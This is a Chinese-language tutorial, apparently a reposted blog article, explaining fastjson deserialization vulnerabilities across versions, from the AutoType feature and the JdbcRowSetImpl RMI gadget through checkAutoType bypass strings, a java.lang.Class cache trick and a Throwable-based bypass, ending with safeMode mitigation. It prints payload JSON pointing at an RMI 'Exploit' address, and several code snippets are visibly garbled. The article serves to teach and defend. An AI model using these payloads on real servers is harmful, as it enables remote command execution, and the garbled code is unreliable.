【深入之Java进阶篇】fastjson的反序列化漏洞(详解总结)

在这里插入图片描述

✔️ fastjson的反序列化漏

  • 1️⃣典型解析
  • 2️⃣拓展知识仓
    • 1️⃣AutoType
    • 2️⃣AutoType 有何错?
    • 3️⃣ 绕过checkAutotype,黑客与fastjson的博弈
    • 4️⃣autoType不开启也能被攻击?
    • 5️⃣利用异常进行攻击
    • 6️⃣AutoType 安全模式?

1️⃣典型解析


当我们使用fastjson进行序列化的时候,当一个类中包含了一个接口(或抽象类)的时候,会将子类型抹去,只保留接口(抽象类)的类型,使得反序列化时无法拿到原始类型。


那么为了解决这个问题,fastjson引入了AutoType,即在序列化的时候,把原始类型记录下来。


因为有了AutoType功能,那么fastjson在对JSON字符串进行反序列化的时候,就会读取 @type到内容,试图把JSON内容反序列化成这个对象,并且会调用这人类的setter方法。


那么这个特性就可能被利用,攻击者自己构造一个JSON字符串,并且使用@type 指定一个自己想要使用的攻击类库实现攻击。


举个栗子,黑客比较常用的攻击类库是com.sun.rowset.JdbcRowSetlmpl,这是sun官方提供的一个类库,这类的dataSourceName支持传入一个 RMI的源,当解析这个uri的时候,就会支持rmi远程调用,去指定的rmi地址中去调用方法。


而fastjson在反序列化时会调用目标类的setter方法,那么如果黑客在JdbcRowSetlmpl的dataSourceName中设置了一个想要执行的命令,那么就会导致很严重的后果。


如通过以下方式定一个JSON串,即可实现远程命令执行(在早期版本中,新版本中JdbcRowSetlmpl已经被加了黑名单)。


{“@type”:“com.sun.rowset.JdbcRowSetImpl” “dataSourceName”.“rmi: //localhost:1999/Exploit”,“autoCommit”:truel }


这就是所谓的远程命令执行漏洞,即利用漏洞入侵到目标服务器,通过服务器执行命令。


Demo1 :我们来看一段代码片段:

一个反序列化例子,包括处理可能的错误和异常,以及数据结构:


import com.alibaba.fastjson.JSON;  
import com.alibaba.fastjson.JSONArray;  
import com.alibaba.fastjson.JSONObject;  
import com.alibaba.fastjson.parser.ParserConfig;  
import com.alibaba.fastjson.parser.deserializer.ObjectDeserializer;  
import com.alibaba.fastjson.serializer.JSONSerializer;  
import com.alibaba.fastjson.serializer.ObjectSerializer;  import java.io.IOException;  
import java.io.OutputStream;  
import java.util.List;  /*** @author 昕宝爸爸爱编程* Demo1*/  
public class Main {  public static void main(String[] args) {  // 复杂的JSON字符串  String json = "{\"name\":\"苏西\",\"age\":20,\"address\":{\"city\":\"北京\",\"street\":\"长安街\"},\"friends\":[{\"name\":\"爱德蒙\",\"age\":25},{\"name\":\"羚羊夫人\",\"age\":30}]}";  // 自定义序列化/反序列化器,这里只是为了演示,实际上需要处理更复杂的逻辑  ParserConfig.getGlobalInstance().addAccept("com.example.");  ParserConfig customParserConfig = ParserConfig.getGlobalInstance();  customParserConfig.putDeserializer(User.class, new UserDeserializer());  customParserConfig.putSerializer(User.class, new UserSerializer());  // 尝试解析JSON字符串  try {  JSONObject jsonObject = JSON.parseObject(json, customParserConfig);  System.out.println("解析成功!");  System.out.println(jsonObject);  // 反序列化嵌套对象和数组  Address address = jsonObject.getObject("address", Address.class);  JSONArray friends = jsonObject.getJSONArray("friends");  List<User> userList = JSONArray.toJavaObject(friends, new TypeReference<List<User>>(){});  System.out.println("Address: " + address);  System.out.println("Friends:");  for (User friend : userList) {  System.out.println(friend);  }  } catch (Exception e) {  System.err.println("解析JSON出错: " + e.getMessage());  }  }  
}  class User {  private String name;  private int age;  private Address address;  // getters and setters...   省略掉了哦
}  class Address {  private String city;  private String street;  // getters and setters...   省略掉了哦
}  class UserDeserializer implements ObjectDeserializer {  @Override  public Object deserialze(JSONParser parser, Type type) {  JSONObject jsonObject = parser.getJSONObject();  return new User(jsonObject.getString("name"), jsonObject.getIntValue("age"), new Address(jsonObject.getString("city"), jsonObject.getString("street")));  }  
}  class UserSerializer implements ObjectSerializer {  @Override  public void write(JSONSerializer serializer, Object object, Object fieldName, Type fieldType) throws IOException {  User user = (User) object;  serializer.write(user); // 这里假设User类实现了Serializable接口,并且有一个合理的默认序列化行为。  }  
}

这个Demo1主要展示了如何使用fastjson库进行JSON的序列化和反序列化,特别是如何处理嵌套对象和数组。同时,也展示了如何自定义反序列化和序列化过程。

2️⃣拓展知识仓


1️⃣AutoType


fastjson的主要功能就是将Java Bean序列化成JSON字符,这样得到字符串之后就可以通过数据库等方式进行持久化了。


但是,fastjson在序列化以及反序列化的过程中并没有使用Java自带的序列化机制,而是自定义了一套机制。


其实,对于JSON框架来说,想要把一个Java对象转换成字符串,可以有两种选择:

1 . 基于属性
2 . 基于setter/getter


而我们所常用的JSON序列化框架中,FastJson和jackson在把对象序列化成json字符审的时候,是通过遍历出该类中的所有getter方法进行的。Gson并不是这么做的,他是通过反射遍历该类中的所有属性,并把其值序列化成json。


假设我们有以下一个Java类:


class Store {private String name;private Fruit fruit;public string getName() {return name;}public void setName(String name) {this .name = name ;}public Fruit getFruit() {return fruit;}public void setFruit(Fruit fruit) {this.fruit = fruit;}}interface Fruit {
}
class Apple implements Fruit {private BigDecimal price;//省略 setter/getter、toString等
}

当我们要对他进行序列化的时候,fastjson会扫描其中的getter方法,即找到getName和getFruit,这时候就会将name和fruit两个字段的值序列化到JSON字符串中。


那么问题来了,我们上面的定义的Fruit只是一个接口,序列化的时候fastjson能够把属性值正确序列化出来吗?如果可以的话,那么反序列化的时候,fastjson会把这个fruit反序列化成什么类型呢?


我们尝试着验证一下,基于(fastison v 1.2.68):


Store store = new store();
store.setName("爱德蒙");
Apple apple = new Apple();
apple.setPrice(new BigDecimal(0.5));
store.setFruit(apple);
string isonstring = ]SON.to]sONstring(store);System.out.println("to]SONString : " + jsonString);

以上代码比较简单,我们创建了一个store,为他指定了名称,并且创建了一个Fruit的子类型Apple,然后将这个store使用 JSON.toJSONString 进行序列化,可以得到以下JSON内容:


toJSONString : {“fruit”:{“price”:0.51},“name”:“爱德蒙”}


那么,这个fruit的类型到底是什么呢,能否反序列化成Apple呢? 我们再来执行以下代码:


Store newstore = JsON.parseObiect(isonstring, Store.class);
System.out.println("parseObject : " + newStore);
Apple newApple = (Apple)newStore.getFruit();
System.out.println("getFruit : " + newApple);

执行结果如下:


在这里插入图片描述

可以看到,在将store反序列化之后,我们尝试将Fruit转换成Apple,但是抛出了异常,尝试直接转换成Fruit则不会报错,如:


Fruit newFruit = newStore.getFruit();
System.out.println("getFruit :" + newFruit);

以上现象,我们知道,当一个类中包含了一个接口(或抽象类)的时候,在使用fastjson进行序列化的时候,会将子类型抹去,只保留接口 (抽象类)的类型,使得反序列化时无法拿到原始类型。


那么有什么办法解决这个问题呢,fastjson引入了AutoType,即在序列化的时候,把原始类型记录下来.使用方法是通过 SerializerFeature.WriteClassName 进行标记,即将上述代码中的:


String jsonString = JSON.toJSONString(store);

修改为:


String jsonString = JSON.toJSONString(store,SerializerFeature.WriteClasslame);

即可,以上代码,输出结果如下:


在这里插入图片描述

可以看到,使用 SerializerFeature.WriteClassName 进行标记后,JSON字符串中多出来一个@Type字段,标注了类对应的原始类型,方便在反序列化的时候定位到具体类型。


如上,将序列化后的字符串在反序列化,既可以顺利的拿到一个Apple类型,整体输出内容:


在这里插入图片描述

这就是AutoType,以及fastison中引入AutoType的原因。


但是,也正是这个特性,因为在功能设计之初在安全方面考虑的不够周全,也给后续fastjson使用者带来了无尽的痛苦。


2️⃣AutoType 有何错?


因为有了autoType功能,那么fastjson在对JSON字符审进行反序列化的时候,就会读取 @type 到内容,试图把JSON内容反序列化成这人对象,并目会调用这个类的setter方法。


那么就可以利用这个特性,自己构造一个JSON字符串,并且使用 @type 指定一个自己想要使用的攻击类库。


举个例子,黑客比较常用的攻击类库是 com.sun.rowset.JdbcRowSetImpl ,这是sun官方提供的一个类库,这个类的dataSourceName支持传入一个rmi的源,当解析这个uri的时候,就会支持rmi远程调用,去指定的rmi地址中去调用方法。


而fastjson在反序列化时会调用目标类的setter方法,那么如果黑客在JdbcRowSetlmpl的dataSourceName中设置了一个想要执行的命令,那么就会导致很严重的后果。

如通过以下方式定一个JSON串,即可实现远程命令执行(在早期版本中,新版本中JdbcRowSetlmpl已经被加了黑名单)


在这里插入图片描述

这就是所谓的远程命令执行漏洞,即利用漏洞入侵到目标服务器,通过服务器执行命令


在早期的fastison版本中(v1.2.25 之前),因为AutoType是默认开启的,并且也没有什么限制,可以说是裸着的。

从v1.2.25开始,fastjson默认关闭了autotype支持,并且加入了checkAutotype,加入了黑名单+白名单来防御autotype开启的情况。

但是,也是从这个时候开始,黑客和fastjson作者之间的博弈就开始了。

因为fastjson默认关闭了autotype支持,并且做了黑白名单的校验,所以攻击方向就转变成了 “如何绕过checkAutotype” 。


下面就来细数一下各个版本的fastjson中存在的漏洞以及攻击原理,**由于篇幅限制,这里并不会讲解的特别细节如果大家感兴趣我后面可以单独写一篇文章讲一讲细节。**下面的内容主要是提供一些思路,目的是说明写代码的时候注意安全性的重要性。


3️⃣ 绕过checkAutotype,黑客与fastjson的博弈


在fastjson v1.2.41 之前,在checkAutotype的代码中,会先进行黑白名单的过滤,如果要反序列化的类不在黑广名单中,那么才会对目标类进行反序列化。


但是在加载的过程中,fastison有一段特殊的处理,那就是在具体加载类的时候会去掉ClassName前后的 L 和 ; ,形们 Lcom.lang.Thread; 。


在这里插入图片描述

而黑白名单又是通过startWith检测的,那么黑客只要在自己想要使用的攻击类库前后加上 L 和 ; 就可以绕过黑白名单的检查了,也不耽误被fastjson正常加载。


Lcom.sun.rowset.JdbcRowSetImpl;,会先通过白名单校验,然后fastison在加载类的时候会去掉前后的L; 变成了 com.sun.rowset.JdbcRowSetlmpl


为了避免被攻击,在之后的 v1.2.42版本中,在进行黑白名单检测的时候,fastjson先判断目标类的类名的前后是不是 L,如果是的话,就截取掉前后的 L; 再进行黑白名单的校验。


看似解决了问题,但是黑客发现了这个规则之后,就在攻击时在目标类前后双写 LL;; ,这样再被截取之后还是可以绕过检测。如 LLcom.sun.rowset.JdbcRowSetImpl;;


魔高一尺,道高一丈。在v1.2.43中,fastison这次在黑白名单判断之前,增加了一个是否以 LL 末开头的判断如果目标类以 LL 开头,那么就直接抛异常,于是就又短暂的修复了这个漏洞。


黑客在 L和 ;,这里走不通了,于是想办法从其他地方下手,因为fastjson在加载类的时候,不只对 L 和,这样的类进行特殊处理,还对 也被特殊处理了。


同样的攻击手段,在目标类前面添加 [ ,v1.2.43以前的所有版本又沦陷了。


于是,在v1.2.44版本中,fastjson的作者做了更加严格的要求,只要目标类以[ 开头或者以 ,结尾,都直接抛异常。也就解决了 v1.2.43及历史版本中发现的bug。


在之后的几个版本中,黑客的主要的攻击方式就是绕过黑名单了,而fastjson也在不断的完善自己的黑名单。


4️⃣autoType不开启也能被攻击?


但是好景不长,在升级到 v1.2.47 版本时,黑客再次找到了办法来攻击。而且这个攻击只有在autoType关闭的的候才生效。

请添加图片描述
是不是很奇怪,autoType不开启反而会被攻击?


因为在fastjson中有一个全局缓存,在类加载的时候,如果autotype没开启,会先尝试从缓存中获取类,如果缓存中有,则直接返回。黑客正是利用这里机制进行了攻击。


黑客先想办法把一个类加到缓存中,然后再次执行的时候就可以绕过黑白名单检测了,多么聪明的手段。

首先想要把一个黑名单中的类加到缓存中,需要使用一个不在黑名单中的类,这个类就是 java.lang.class

java.lang.class 类对应的deserializer为MiscCodec,反序列化时会取JSON字符串中的val值并加载这个val对应的类。

如果fastjson cache为true,就会缓存这个val 对应的 class 到全局缓存中

如果再次加载 val 名称的类,并且autotype没开启,下一步就是会尝试从全局缓存中获取这个 class,进而进行攻击。

所以,黑客只需要把攻击类伪装以下就行了,如下格式:

{“@type”:“java.lang.Class”,“val”: “com.sun,rowset.JdbcRowSetImpl”}


于是在v1.2.48中,fastjson修复了这个bug,在MiscCodec中,处理Class类的地方,设置了fastjson cache为false,这样攻击类就不会被缓存了,也就不会被获取到了。


在之后的多个版本中,黑客与fastjson又继续一直都在绕过黑名单、添加黑名单中进行周旋。


直到后来,黑客在 v1.2.68之前的版本中又发现了一个新的漏洞利用方式。


5️⃣利用异常进行攻击


在fastjson中,如果,@type 指定的类为 Throwable 的子类,那对应的反序列化处理类就会使用到ThrowapleDeserializer


而在ThrowableDeserializer#deserialze的方法中,当有一个字段的key也是 @type时,就会把这个 value 当做类名,然后进行一次 checkAutoType 检测。


并且指定了expectClass为Throwable.class,但是在checkAutoType中,有这样一约定,那就是如果指定了expectClass,那么也会通过校验


在这里插入图片描述

因为fastison在反序列化的时候会尝试执行里面的getter方法,而Exception类中都有一个getMessage方法。


黑客只需要自定义一个异常,并目重写写其getMessage就达到了攻击的目的。


这个漏洞就是6月份全网疯传的那个”严重漏洞”,使得很多开发者不得不升级到新版本


这个漏洞在 v1.2.69中被修复,主要修复方式是对于需要过滤掉的expectClass进行了修改,新增了4个新的类,并且将原来的Class类型的判断修改为hash的判断。


其实,根据fastjson的官方文档介绍,即使不升级到新版,在v1.2.68中也可以规避掉这个问题,那就是使用safeMode


6️⃣AutoType 安全模式?


可以看到,这些漏洞的利用几乎都是围绕AutoType来的,于是,在 v1.2.68版本中,引入了safeMode,配置safeMode后,无论白名单和黑名单,都不支持autoType,可一定程度上缓解反序列化Gadgets类变种攻击。


设置了safeMode后,@type 字段不再生效,即当解析形@type":"comjava.class"的JSON串时,将不再反序列化出对应的类。


开启safeMode方式如下

ParserConfig.getGlobalInstance().setSafeMode(true);


如在本文的最开始的代码示例中,使用以上代码开启safeMode模式,执行代码,会得到以下异常:


在这里插入图片描述

但是值得注意的是,使用这个功能,fastjson会直接禁用autoType功能,即在checkAutoType方法中,直接抛出个异常。


在这里插入图片描述

开发者可以将自己项目中使用的fastjson升级到最新版,并且如果代码中不需要用到Autolype的话,可以考虑使用safeMode,但是要评估下对历史代码的影影响。


因为fastjson自己定义了序列化工具类,并且使用asm技术避免反射、使用缓存、并且做了很多算法优化等方式,大大提升了序列化及反序列化的效率。


看一个对比表:

在这里插入图片描述

当然,快的同时也带来一些安全性问题,这是不可否认的。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/588698.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

mllib可扩展学习库java api使用

mllib可扩展学习库java api是使用Apache Spark构建的机器学习库&#xff0c;包括分类&#xff0c;聚类&#xff0c;特征提取和预处理等功能。本文将从以下几个方面详细介绍如何使用mllib可扩展学习库java api。 一、数据预处理 数据预处理是机器学习的重要步骤之一&#xff0…

2023.12.28 Python高级-正则表达式

目录 re正则表达式,一种专门用来匹配目标字符串的规则 re.match(),从头匹配一个,无则none re.search(), 不从头匹配返回一个,无则none re.findall(), 不从头匹配,用list返回所有 re分组 re匹配修饰符 re贪婪非贪婪 re切割和替换 re正则表达式,一种专门用来匹配目标字符串…

linux的页缓存page cache

目录 如何查看系统的 Page Cache&#xff1f; 为什么 Linux 不把 Page Cache 称为 block cache&#xff1f; Page Cache 的优劣势 Page Cache 的优势 加快数据访问 减少 IO 次数&#xff0c;提高系统磁盘 I/O 吞吐量 Page Cache 的劣势 由于我们开发的程序要运行的话一般…

redis—List列表

目录 前言 1.常见命令 2.使用场景 前言 列表类型是用来存储多个有序的字符串&#xff0c;如图2-19所示&#xff0c;a、b、C、d、e五个元素从左到右组成 了一个有序的列表&#xff0c;列表中的每个字符串称为元素(element) &#xff0c;一个列表最多可以存储2^32 - 1 个元素…

功能开发 -- 向埃隆·马斯克学习任务分解

文章目录 马斯克的任务分解软件开发的任务分解可执行的最小单位任务小结 马斯克的任务分解 我们都知道埃隆马斯克&#xff08;Elon Musk&#xff09;&#xff0c;他既是电动汽车公司特斯拉&#xff08;Tesla&#xff09;的创始人&#xff0c;同时还创建了太空探索公司 SpaceX。…

李宏毅 自然语言处理(Voice Conversion) 笔记

前一章笔记&#xff1a;李宏毅 自然语言处理&#xff08;Speech Recognition&#xff09; 笔记 引入 什么是voice conversion&#xff1f; 输入一段声音&#xff0c;输出另一段声音&#xff0c;我们希望这两端声音&#xff1a;内容一样&#xff0c;其他方面不一样&#xff08…

[设计模式 Go实现] 创建型~建造者模式

建造者模式&#xff08;Builder Pattern&#xff09;使用多个简单的对象一步一步构建成一个复杂的对象。这种类型的设计模式属于创建型模式&#xff0c;它提供了一种创建对象的最佳方式。 一个 Builder 类会一步一步构造最终的对象。该 Builder 类是独立于其他对象的。 代码实…

每日一题——LeetCode977

方法一 个人方法&#xff1a; 以示例1为例&#xff1a;把[-4,-1,0,3,10] 中n<0的元素拆分出来&#xff0c;把他们的平方从小到大放入arr数组&#xff0c;则arr[0,1,16] ,那数组就还剩[3,10] 对于剩下的元素&#xff0c;看arr里面有没有比他们平方更小的元素先放入res数组&…

vue3-12

需求是用户如果登录了&#xff0c;可以访问主页&#xff0c;如果没有登录&#xff0c;则不能访问主页&#xff0c;随后跳转到登录界面&#xff0c;让用户登录 实现思路&#xff0c;在用户登录之前做一个检查&#xff0c;如果登录了&#xff0c;则token是存在的&#xff0c;则放…

回顾2023,我的编程学习之旅

文章目录 前言我与C语言初识C语言简易扫雷游戏二进制的美妙神奇的指针强大的结构体灵活的动态内存管理总结 我与竞赛我与CSDN结语 前言 6月8号高考结束了&#xff0c;虽然还没有出分&#xff0c;但是也大致规划好自己想学什么专业了&#xff0c;没错就是计算机&#xff0c;出分…

RedisTemplate自增时保证原子性的lua脚本限制接口请求频率

场景&#xff1a;限制请求后端接口的频率&#xff0c;例如1秒钟只能请求次数不能超过10次&#xff0c;通常的写法是&#xff1a; 1.先去从redis里面拿到当前请求次数 2.判断当前次数是否大于或等于限制次数 3.当前请求次数小于限制次数时进行自增 这三步在请求不是很密集的时…

yarn run dev运行ant design pro项目报错-‘max‘ 不是内部或外部命令

运行ant design pro项目报错&#xff1a; >>yarn run dev yarn run v1.22.19 $ npm run start:dev > ant-design-pro6.0.0-beta.1 start:dev > cross-env REACT_APP_ENVdev MOCKnone UMI_ENVdev max dev max 不是内部或外部命令&#xff0c;也不是可运行的程序 …

PyTorch中常用的工具(4)Visdom

文章目录 前言3.2 Visdom 前言 在训练神经网络的过程中需要用到很多的工具&#xff0c;最重要的是数据处理、可视化和GPU加速。本章主要介绍PyTorch在这些方面常用的工具模块&#xff0c;合理使用这些工具可以极大地提高编程效率。 由于内容较多&#xff0c;本文分成了五篇文…

影视后期: PR调色处理,调色工具面板介绍

写在前面 整理一些影视后期的相关笔记博文为 Pr 调色处理&#xff0c;涉及调色工具面板简单认知包括 lumetri 颜色和范围面板理解不足小伙伴帮忙指正 元旦快乐哦 _ 名词解释 饱和度 是指色彩的鲜艳程度&#xff0c;也被称为色彩的纯度。具体来说&#xff0c;它表示色相中灰色…

从马尔可夫奖励过程到马尔可夫决策到强化学习【01/2】

一、说明 关于马尔可夫过程&#xff0c;如何将马尔可夫决策转化成决策依据&#xff0c;这里介绍的基本的思想路径&#xff0c;为读者将来设计和应用决策模型提供理论上的参考。 这是了解强化学习的一系列基础文章的后续文章。如果您有兴趣了解强化学习&#xff0c;请查看此处。…

运维系列Nginx:设置黑/白名单IP限制

黑/白名单IP限制访问配置 第一种&#xff1a;deny和allow指令属于ngx_http_access_module&#xff0c;nginx默认加载此模块&#xff0c;所以可直接使用。这种方式&#xff0c;最简单&#xff0c;最直接。设置类似防火墙iptable&#xff0c;使用方法&#xff1a; # 白名单设置&a…

【数值分析】choleskey分解,matlab实现

平方根分解&#xff08;Choleskey分解&#xff09; A G G T , A 对称正定 AGG^ \mathrm T \,\,,\,\, A对称正定 AGGT,A对称正定 A L D M L D L T ( L D 1 / 2 ) ( L D 1 / 2 ) T G G T \begin{align*} A LDM LDL^ \mathrm T(LD^{1/2})(LD^{1/2})^ \mathrm TGG^ \mathrm T…

huggingface的tokenizer解读

文章目录 前言一、huggingface的tokenizer含义1、含义2、整体概括 二、加载lmsys/vicuna-7b-v1.5模型的tokenizer三、调用tokernizer方法四、字符串的tokens应用1、tokenizer应用2、tokenizer进行token分词(tokenizer.tokenize)3、tokens转模型识别ids(tokenizer.convert_token…

STM32F407-14.3.10-表73具有有断路功能的互补通道OCx和OCxN的输出控制位-00x10

如上表所示&#xff0c;MOE0&#xff0c;OSSI0&#xff0c;CCxE1&#xff0c;CCxNE0时&#xff0c;OCx与OCxN的输出状态取决于GPIO端口上下拉状态。 ---------------------------------------------------------------------------------------------------------------------…

Python 中的运算符介绍(1)

算数运算符 常见的% 、//、/ 用法 赋值运算符 赋值运算&#xff1a;将等号右边赋值给等号左边 常见场景&#xff1a; 比较运算符 代码解析&#xff1a; 逻辑运算符 位运算符&#xff08;了解&#xff09; 三目运算符 身份证运算符 成员运算符